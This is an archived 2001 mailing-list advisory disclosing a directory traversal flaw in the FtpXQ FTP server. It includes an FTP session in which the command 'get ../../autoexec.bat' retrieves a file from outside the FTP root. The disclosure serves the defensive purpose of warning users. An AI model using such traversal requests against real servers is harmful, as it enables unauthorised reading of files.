Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
Date: Wed Feb 28 2001 - 17:32:19 CST
----- Begin Hush Signed Message from joetestahushmail.com -----
Vulnerability in FtpXQ Server
The following is an illustration of the problem. An ftp root of
"c:\directory\directory" was used.
% ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.93).
User (xxxxxxxxx.rh.rit.edu:(none)): test
331 OK need password.
230 Welcome to DataWizard Technologies' FtpXQ FTP Server.
257 Remote directory is "/directory/directory/"
ftp> cd ..
550 Requested file action not taken---user does not have access.
ftp> get ../../autoexec.bat
150 Opening data connection.
226 Transfer completed.
ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
No quick fix is possible.
DataWizard Technologies, Inc. was contacted via <ftpxqdatawizard.net>
on Tuesday, February 20, 2001. No reply was received.
- Joe Testa ( e-mail: joetestahushmail.com / AIM: LordSpankatron )
----- Begin Hush Signature v1.3 -----
----- End Hush Signature v1.3 -----
This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools
Free, encrypted, secure Web-based email at www.hushmail.com
IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.